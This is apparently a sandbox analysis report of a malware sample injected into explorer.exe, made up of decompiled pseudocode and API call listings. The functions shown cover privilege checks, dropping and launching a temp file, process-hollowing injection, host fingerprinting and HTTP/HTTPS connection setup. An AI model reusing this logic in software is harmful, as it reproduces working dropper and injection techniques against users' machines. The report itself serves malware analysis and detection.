    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
    • CloseHandle.KERNEL32(?), ref: 007C424E
    • AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
    • EqualSid.ADVAPI32(?,?), ref: 007C42A2
    • FreeSid.ADVAPI32(?), ref: 007C42BE
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C41C8, Relevance: 15.1, APIs: 10, Instructions: 87thread
    C-Code - Quality: 100%
    			E007C41C8(intOrPtr* __eax) {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t52;

				 *__eax =  *__eax + __eax;
				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E007C13DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x7ca2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t52 =  *_v16 - 1;
						if(_t52 >= 0) {
							_v36 = _t52 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L11;
							}
							_v5 = 1;
						}
						L11:
						FreeSid(_v24);
					}
					E007C1440(_v16);
				}
				return _v5;
			}












    0x007c41ca
    0x007c41d2
    0x007c41eb
    0x007c41f2
    0x007c4214
    0x007c4214
    0x007c421b
    0x007c422b
    0x007c4247
    0x007c424e
    0x007c4258
    0x007c4278
    0x007c4283
    0x007c4286
    0x007c4289
    0x007c428c
    0x007c4293
    0x007c42b2
    0x007c42b5
    0x007c42b5
    0x007c42b8
    0x00000000
    0x00000000
    0x00000000
    0x007c42b8
    0x007c42ac
    0x007c42ac
    0x007c42ba
    0x007c42be
    0x007c42be
    0x007c42c7
    0x007c42c7
    0x007c42d2

    APIs
    • GetCurrentThread.KERNEL32 ref: 007C41DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
    • GetLastError.KERNEL32 ref: 007C41F4
    • GetCurrentProcess.KERNEL32 ref: 007C4207
    • OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
    • CloseHandle.KERNEL32(?), ref: 007C424E
    • AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
    • EqualSid.ADVAPI32(?,?), ref: 007C42A2
    • FreeSid.ADVAPI32(?), ref: 007C42BE
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C82F8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106processsleep
    C-Code - Quality: 100%
    			E007C82F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr _t41;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t77;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = E007C7CFC(_v12);
				E007C1258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t41 =  *0x7ca168; // 0x7c1dec
					E007C7290(_t41);
				} else {
					_v28 = E007C1110(_v8, 0x7c8494);
					_t96 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E007C7560( &_v1054, 0x7c8494, _t96);
						E007C1308( &_v541, 0x7c849c);
						E007C133C( &_v541,  &_v1054);
						E007C133C( &_v541, 0x7c849c);
						_t57 =  *0x7ca0a8; // 0x7c1c4c
						E007C133C( &_v541, _t57);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x7cb514 = 0;
							_t62 =  *0x7cb510; // 0x490000
							E007C1828(_t62);
							E007C13B4(0x7cb510, _v16);
							_t66 =  *0x7cb510; // 0x490000
							E007C12B8(_t66, _v16, _v12);
							 *0x7cb514 = _v16;
							 *0x7cbe1c = 0;
							wsprintfA("1530474054", 0x7c84a0, _v24);
						} else {
							E007C485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t77 =  *0x7ca174; // 0x7c1e10
								E007C7290(_t77);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}


















    0x007c8301
    0x007c8304
    0x007c8307
    0x007c830c
    0x007c8317
    0x007c8325
    0x007c832a
    0x007c8338
    0x007c8481
    0x007c8486
    0x007c833e
    0x007c834b
    0x007c834e
    0x007c8352
    0x007c8364
    0x007c8370
    0x007c8380
    0x007c8393
    0x007c83a7
    0x007c83af
    0x007c83bc
    0x007c83cb
    0x007c842d
    0x007c8432
    0x007c8437
    0x007c8444
    0x007c844f
    0x007c8454
    0x007c845c
    0x007c8461
    0x007c8476
    0x007c83cd
    0x007c83d9
    0x007c83e3
    0x007c8414
    0x007c841f
    0x007c8424
    0x007c8416
    0x007c8416
    0x007c8416
    0x007c8414
    0x007c83cb
    0x007c8352
    0x007c8491

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
    • Sleep.KERNEL32(000005DC), ref: 007C83E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • wsprintfA.USER32 ref: 007C8476
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
      • Part of subcall function 007C7290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007C72AC
      • Part of subcall function 007C7290: CloseHandle.KERNEL32(?), ref: 007C72B9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C9347, Relevance: 9.1, APIs: 6, Instructions: 82
    C-Code - Quality: 75%
    			E007C9347() {
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t42;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t51;

				if( *_t49() != 0) {
					 *_t47(0);
				}
				if(E007C453C(GetCurrentProcess()) == 0) {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					E007C133C(_t51 - 0x218, 0x7c946c);
				} else {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					_t42 =  *0x7ca0b0; // 0x7c1c64
					E007C133C(_t51 - 0x218, _t42);
				}
				_t24 =  *0x7ca08c; // 0x7c1c00
				E007C133C(_t51 - 0x218, _t24);
				 *((intOrPtr*)(_t51 - 0xc)) = E007C5028(_t51 - 0x218, 0, E007C9080, _t51 - 0x117, 0xffffffff, 0xfa0);
				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
					 *0x7cb21c(0, _t51 - 0x218, 0x26, 0xffffffff);
					_t32 =  *0x7ca0dc; // 0x7c1ce8
					E007C133C(_t51 - 0x218, _t32);
					if(PathFileExistsA(_t51 - 0x218) != 0) {
						 *((intOrPtr*)(_t51 - 0xc)) = E007C5028(_t51 - 0x218, 0, E007C9080, _t51 - 0x117, 0xffffffff, 0xfa0);
					}
				}
				ExitProcess(0);
			}









    0x007c934c
    0x007c9350
    0x007c9352
    0x007c9366
    0x007c939d
    0x007c93af
    0x007c9368
    0x007c9374
    0x007c937a
    0x007c9387
    0x007c938c
    0x007c93b7
    0x007c93c4
    0x007c93f0
    0x007c93f7
    0x007c9406
    0x007c940c
    0x007c9419
    0x007c9430
    0x007c9456
    0x007c9456
    0x007c9430
    0x007c945b

    APIs
    • GetCurrentProcess.KERNEL32 ref: 007C9359
      • Part of subcall function 007C453C: GetCurrentProcess.KERNEL32 ref: 007C4555
      • Part of subcall function 007C453C: IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 007C9374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 007C939D
      • Part of subcall function 007C5028: GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
      • Part of subcall function 007C5028: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
      • Part of subcall function 007C5028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
      • Part of subcall function 007C5028: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C5028: GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
      • Part of subcall function 007C5028: VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
      • Part of subcall function 007C5028: WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C5028: ResumeThread.KERNEL32(?), ref: 007C527E
      • Part of subcall function 007C5028: WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
      • Part of subcall function 007C5028: GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
      • Part of subcall function 007C5028: CloseHandle.KERNEL32(?), ref: 007C52BE
      • Part of subcall function 007C5028: CloseHandle.KERNEL32(?), ref: 007C52C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C9406
    • PathFileExistsA.SHLWAPI(?), ref: 007C9428
    • ExitProcess.KERNEL32 ref: 007C945B
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7C4E, Relevance: 9.1, APIs: 6, Instructions: 66file
    C-Code - Quality: 100%
    			E007C7C4E(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;

				_v8 = __eax;
				_v12 = 0;
				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
					SetFilePointer(_v16, _v24 + 4, 0, 0);
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}











    0x007c7c56
    0x007c7c5b
    0x007c7c77
    0x007c7c7e
    0x007c7c99
    0x007c7c99
    0x007c7ca0
    0x007c7cb2
    0x007c7cc7
    0x007c7cdd
    0x007c7ce7
    0x007c7cf0
    0x007c7cf0
    0x007c7cf9

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
    • CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7C50, Relevance: 9.1, APIs: 6, Instructions: 65file
    C-Code - Quality: 100%
    			E007C7C50(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;

				_v8 = __eax;
				_v12 = 0;
				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
					SetFilePointer(_v16, _v24 + 4, 0, 0);
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}











    0x007c7c56
    0x007c7c5b
    0x007c7c77
    0x007c7c7e
    0x007c7c99
    0x007c7c99
    0x007c7ca0
    0x007c7cb2
    0x007c7cc7
    0x007c7cdd
    0x007c7ce7
    0x007c7cf0
    0x007c7cf0
    0x007c7cf9

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
    • CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4A68, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88registry
    C-Code - Quality: 92%
    			E007C4A68(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				int _t30;
				char* _t32;
				intOrPtr _t37;
				signed int _t52;
				signed char _t62;
				intOrPtr _t67;

				_v8 = __eax;
				_v12 = 0;
				_v16 = 0x81;
				_t30 = GetComputerNameA( &_v153,  &_v16);
				_t72 = _t30;
				if(_t30 != 0) {
					_v12 = E007C1740( &_v153);
				}
				_t32 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24);
				_v16 = 4;
				_v20 = 0;
				_t37 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v24, _t37, 0, 0,  &_v20,  &_v16);
				E007C3890(_v24);
				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
				E007C1164(_v12,  &_v153);
				 *0x7ca064 = E007C44F0(_t72);
				 *0x7ca068 = E007C42D4(GetCurrentProcess());
				if(E007C44F0(_t72) >= 0x3c) {
					_t52 = E007C42D4(GetCurrentProcess());
					__eflags = _t52 - 3;
					_t21 = _t52 == 3;
					__eflags = _t21;
					asm("sbb eax, eax");
					 *0x7ca034 =  ~(_t52 & 0xffffff00 | _t21);
				} else {
					_t62 = E007C41CC();
					asm("sbb eax, eax");
					 *0x7ca034 =  ~_t62;
				}
				if( *0x7ca034 != 0) {
					_t67 =  *0x7ca09c; // 0x7c1c30
					E007C1308(_v8, _t67);
				}
				E007C133C(_v8, 0x7c4b9c);
				return E007C133C(_v8,  &_v153);
			}















    0x007c4a71
    0x007c4a76
    0x007c4a79
    0x007c4a8b
    0x007c4a91
    0x007c4a93
    0x007c4aa0
    0x007c4aa0
    0x007c4aae
    0x007c4ab9
    0x007c4abf
    0x007c4ac8
    0x007c4ad7
    0x007c4ae1
    0x007c4aec
    0x007c4afc
    0x007c4b08
    0x007c4b12
    0x007c4b22
    0x007c4b2f
    0x007c4b47
    0x007c4b4c
    0x007c4b4f
    0x007c4b4f
    0x007c4b54
    0x007c4b56
    0x007c4b31
    0x007c4b31
    0x007c4b38
    0x007c4b3a
    0x007c4b3a
    0x007c4b62
    0x007c4b64
    0x007c4b6d
    0x007c4b6d
    0x007c4b7b
    0x007c4b99

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 007C4A8B
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C4AB9
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
      • Part of subcall function 007C44F0: GetVersionExA.KERNEL32(0000009C), ref: 007C451A
    • GetCurrentProcess.KERNEL32 ref: 007C4B17
      • Part of subcall function 007C42D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
      • Part of subcall function 007C42D4: GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
      • Part of subcall function 007C42D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
      • Part of subcall function 007C42D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C42D4: CloseHandle.KERNEL32(?), ref: 007C43F3
    • GetCurrentProcess.KERNEL32 ref: 007C4B41
      • Part of subcall function 007C41CC: GetCurrentThread.KERNEL32 ref: 007C41DE
      • Part of subcall function 007C41CC: OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
      • Part of subcall function 007C41CC: GetLastError.KERNEL32 ref: 007C41F4
      • Part of subcall function 007C41CC: GetCurrentProcess.KERNEL32 ref: 007C4207
      • Part of subcall function 007C41CC: OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C41CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
      • Part of subcall function 007C41CC: CloseHandle.KERNEL32(?), ref: 007C424E
      • Part of subcall function 007C41CC: AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
      • Part of subcall function 007C41CC: EqualSid.ADVAPI32(?,?), ref: 007C42A2
      • Part of subcall function 007C41CC: FreeSid.ADVAPI32(?), ref: 007C42BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C82F4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82processsleep
    C-Code - Quality: 100%
    			E007C82F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t78;

				_t36 = __eax -  *__eax;
				 *_t36 =  *_t36 + _t36;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = _t36;
				_v20 = 0;
				_v24 = E007C7CFC(_v12);
				E007C1258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t42 =  *0x7ca168; // 0x7c1dec
					E007C7290(_t42);
				} else {
					_v28 = E007C1110(_v8, 0x7c8494);
					_t102 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E007C7560( &_v1054, 0x7c8494, _t102);
						E007C1308( &_v541, 0x7c849c);
						E007C133C( &_v541,  &_v1054);
						E007C133C( &_v541, 0x7c849c);
						_t58 =  *0x7ca0a8; // 0x7c1c4c
						E007C133C( &_v541, _t58);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x7cb514 = 0;
							_t63 =  *0x7cb510; // 0x490000
							E007C1828(_t63);
							E007C13B4(0x7cb510, _v16);
							_t67 =  *0x7cb510; // 0x490000
							E007C12B8(_t67, _v16, _v12);
							 *0x7cb514 = _v16;
							 *0x7cbe1c = 0;
							wsprintfA("1530474054", 0x7c84a0, _v24);
						} else {
							E007C485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t78 =  *0x7ca174; // 0x7c1e10
								E007C7290(_t78);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}



















    0x007c82f4
    0x007c82f6
    0x007c8301
    0x007c8304
    0x007c8307
    0x007c830c
    0x007c8317
    0x007c8325
    0x007c832a
    0x007c8338
    0x007c8481
    0x007c8486
    0x007c833e
    0x007c834b
    0x007c834e
    0x007c8352
    0x007c8364
    0x007c8370
    0x007c8380
    0x007c8393
    0x007c83a7
    0x007c83af
    0x007c83bc
    0x007c83cb
    0x007c842d
    0x007c8432
    0x007c8437
    0x007c8444
    0x007c844f
    0x007c8454
    0x007c845c
    0x007c8461
    0x007c8476
    0x007c83cd
    0x007c83d9
    0x007c83e3
    0x007c8414
    0x007c841f
    0x007c8424
    0x007c8416
    0x007c8416
    0x007c8416
    0x007c8414
    0x007c83cb
    0x007c8352
    0x007c8491

    APIs
      • Part of subcall function 007C7290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007C72AC
      • Part of subcall function 007C7290: CloseHandle.KERNEL32(?), ref: 007C72B9
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
    • wsprintfA.USER32 ref: 007C8476
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
    • Sleep.KERNEL32(000005DC), ref: 007C83E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C9230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48sleep
    C-Code - Quality: 78%
    			E007C9230(intOrPtr* __ebx, intOrPtr* __ecx) {
				void* _t11;
				int _t12;
				CHAR* _t14;
				void* _t22;
				intOrPtr _t24;
				void* _t25;

				if( *__ecx() != 0) {
					_push(0);
					 *__ebx();
				}
				_pop(_t22);
				_pop(_t19);
				_t24 =  *0x7ca0a8; // 0x7c1c4c
				_t11 = E007C1110( *((intOrPtr*)(_t25 - 4)), _t24);
				_t29 = _t11;
				if(_t11 == 0) {
					 *((char*)(_t25 - 0x116)) = 0x2d;
				} else {
					 *((char*)(_t25 - 0x116)) = 0x2b;
					Sleep(0x3a98);
				}
				_t12 = E007C6E04(_t22, _t29);
				if(_t12 == 0) {
					if( *((char*)(_t25 - 0x116)) != 0x2d) {
						L9:
						_push(_t12);
						_push(_t22);
						_t12 = E007C69BC(_t24, _t32) + E007C92CD;
						goto __eax;
					}
					_t14 =  *0x7ca0d8; // 0x7c1cc8
					_t12 = OpenMutexA(0x100000, 0, _t14);
					 *(_t25 - 8) = _t12;
					_t32 =  *(_t25 - 8);
					if( *(_t25 - 8) == 0) {
						goto L9;
					}
					_t12 = CloseHandle( *(_t25 - 8));
					ExitProcess(0);
				}
				return _t12;
			}









    0x007c9235
    0x007c9237
    0x007c9239
    0x007c923b
    0x007c923f
    0x007c9240
    0x007c9242
    0x007c924b
    0x007c9250
    0x007c9252
    0x007c9268
    0x007c9254
    0x007c9254
    0x007c9260
    0x007c9260
    0x007c926f
    0x007c9276
    0x007c9283
    0x007c92b3
    0x007c92b3
    0x007c92b5
    0x007c92bb
    0x007c92cb
    0x007c92cb
    0x007c9285
    0x007c9292
    0x007c9298
    0x007c929b
    0x007c929f
    0x00000000
    0x00000000
    0x007c92a5
    0x007c92ad
    0x007c92ad
    0x007c9464

    APIs
    • Sleep.KERNEL32(00003A98), ref: 007C9260
      • Part of subcall function 007C6E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 007C6E26
      • Part of subcall function 007C6E04: CharUpperBuffA.USER32(?,000001F5), ref: 007C6E37
    • OpenMutexA.KERNEL32(00100000,00000000,007C1CC8), ref: 007C9292
    • CloseHandle.KERNEL32(00000000), ref: 007C92A5
    • ExitProcess.KERNEL32 ref: 007C92AD
      • Part of subcall function 007C69BC: GetTempPathA.KERNEL32(00000101,?), ref: 007C69E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3C28, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184file
    C-Code - Quality: 98%
    			E007C3C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				signed int _v72;
				char _v201;
				char _v458;
				void _v1483;
				signed int _t88;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t175;
				void* _t180;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t176 =  *0x7cb7a4;
				if( *0x7cb7a4 == 0) {
					E007C3A04(_t176);
				}
				_t162 =  *0x7ca1a4; // 0x7c1ec0
				_t88 = E007C1110(_v8, _t162);
				asm("sbb eax, eax");
				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
				_v56 = E007C1110(_v8, E007C3E98);
				if(_v56 != 0) {
					_v56 = _v56 + 2;
					_v60 = E007C1110(_v56, 0x7c3e9c);
					_v32 = _v60 - _v56;
					E007C12B8( &_v201, _v32, _v56);
					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
					E007C1308( &_v458, _v60);
				}
				_t93 =  *0x7ca298; // 0x0
				_t94 = _t93 - 1;
				_t180 = _t94;
				if(_t180 < 0) {
					_v64 = 0;
				} else {
					if(_t180 == 0) {
						_v64 = 0;
					} else {
						if(_t94 == 1) {
							_v64 = 1;
						}
					}
				}
				_v20 = E007C3864(0x7cb7a4, _v64, 0, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x50;
				} else {
					_v72 = 0x1bb;
				}
				_v24 = E007C161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x4400000;
				} else {
					_v72 = 0x4c03000;
				}
				_t165 =  *0x7ca244; // 0x7c20b8
				_v28 = E007C1660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
				if(_v68 != 0) {
					_v32 = 4;
